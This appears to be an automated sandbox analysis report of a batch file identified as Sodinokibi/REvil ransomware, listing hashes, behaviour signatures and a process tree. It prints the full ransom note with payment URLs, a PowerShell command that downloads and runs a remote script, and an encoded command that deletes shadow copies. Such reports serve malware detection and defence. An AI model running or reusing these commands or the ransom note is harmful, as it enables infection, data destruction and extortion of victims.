Overview

overview

10

Static

static

bRDkHdRf.bat

windows7_x64

10

bRDkHdRf.bat

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v200410
  • submitted
    22-04-2020 18:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    bRDkHdRf.bat

  • Size

    189B

  • MD5

    b0fdd8126abe00e3607bc60b33cfd211

  • SHA1

    22fe9dfc70b79b53d6a958d30c42dd7640554e8d

  • SHA256

    8508a74435256a2c8472db03d6c09f8ac0d60ded076803d1dc9e5bec75b162ac

  • SHA512

    cc6eab2d339081bce0d73366bda16a138f53f6ee31b0d39a23ffbe4dfb68511a8d0917092296706b8d9fba32d0aa0efea2d9c89b88baaa5f2b36fe426302514d

Score
10/10
ransomwareevasionspywaretrojansodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/bRDkHdRf

Extracted

Path

C:\ivx701a929-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. OSTEAD. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ivx701a929. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/FB14B9B4438547FC Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: R0hPrLslpFUUNBjfeCGcwHMlWqoHwFDYEoyctNwVIC3MkuKbluribspacY+AtUpW HXNtiTkBKCIJtZZ2E0b9CVe5UuWKgXqPERTfExZYheqRUry+pL//nN8bGdpsjkRx oYwo4wyZhwsevS4LIc2C5kboncsIhViyWLCFyGZg7x1kXn/bn2OlOmaGchePbcaY 5AS268A6SNr8aEQYOwbjYolRnfDyPXmGAeyeWLbnoJYpb4JRwAhh0iv8JmusWN2z I8cZN0UDe/PG7IGL6PowOY0hhFCrXLiW0y/C7UgZ7rdbcZo1mJP2uQu9EthRLDRF 9BdVq6KSgEQV9LjLXr9oWA59ZOUqguO1c5snQzTLBK4nrYh/XBuMMIWM8W3+amIj ZSbbtgsuSZIyc50koc4y21/KnLYpitTi3/X40ekX0k3GA+ESYNBhRYEbh5vymR1H wQD0IbKpSZEEci3oltQxLflqvMSHwKBP35M9nhw/axaH7ATpWwbLA2keOtwSq9yR /vt8ItmlcTt9xikbrBSMxDRwjtncM+ecZu6AG9qhbsafn7DpbJPgKOWHHxjTMj32 DmkT6TLitNhwnPjODhpjgw6B62YZlB35TFi94GIURf1EvkB2hwsfggHDKw4u8K9m htm8dnzCRiv+LnoIFYaJtlVcltXzHSOalzgtnjx9UY9tqdunYCmJem9WDiz4va8h ry3LR+bNIUSyE+mKNNcmuZEyr6Lhcsws7qORzpqr/nzjCDoFJfC05SnzpihKURs/ BHyjGaapQiCrxekTq+C26oKcbIXMsnLiz85ewqqq0PTq9T9cnyJW869toX+aGT2Y klIAtJ8dhoAF6f55em+QwmxQJZW3+kVsIgcECvGIsOGIuPY1/2GEBttyCILBnnFN cMOLE7bc/FBZ63lP6TZ3DR5ZmqSWom4e/c+hQqgnbY31D28m0SqdHCx3r/rxV4Wf aM4fE/JT4OfqkemkrZoSx2Ohl9LjVa6G+w4XTspQhEFLHZzk8oyHGbQgN/Dpk5Co pWc+BQBcDVvBFiyb9oCqWNtFk8SNTokRZHBskgoyFsLgC8pOWysCOcDGFuq5jxI2 8LcAhC645DlnFg7aXcFQmRE2YFOia2Mv4/8u4YYBkuj+BFQAWo3CUOa7+ajbh0Iy fX2pFG0f519HzcKfbpRZjv8UUR3DYZYEEVvfbBPNCTyYADeEcxAosAwaSUIh0H9F /qnpdG2L7vlryWC3WT5WeN5fWRQGVRQo2/QL0owN5LuFq3EgGNnbmUJkftQ2tFHe x7LheHdyMTgB69RKCPG59m72jUbiwl3iaV72FkK49CBK9coHHz/hFQ== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/FB14B9B4438547FC

http://decryptor.cc/FB14B9B4438547FC

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Blacklisted process makes network request 56 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Makes http(s) request 17 IoCs

    Contacts server via http/https, possibly for C2 communication.

  • Drops file in System32 directory 1 IoCs
  • Modifies service 2 TTPs 4 IoCs
    persistence
  • Suspicious use of WriteProcessMemory 5 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Enumerates connected drives 3 TTPs
  • Drops file in Program Files directory 16 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\bRDkHdRf.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2024
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/bRDkHdRf');Invoke-JUCJCK;Start-Sleep -s 10000"
      2⤵
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Blacklisted process makes network request
      • Sets desktop wallpaper using registry
      • Drops file in System32 directory
      • Suspicious use of WriteProcessMemory
      • Modifies system certificate store
      • Drops file in Program Files directory
      PID:1036
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:1508
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1728

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_05471756-4b9c-45e9-8ddd-05fab605d637
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_20b90e15-f237-499e-a823-6772568bf000
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_37386d62-281a-4a91-a575-6755e45f3238
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_5028523d-10aa-4674-b3d1-9db9e7b9fbf6
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a24b3c29-8785-47a4-90c7-9951cb5bf055
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b3feaac6-0199-4ad4-87ff-a4b7cbd02223
    Download Submit

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
    Download Submit

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Download Submit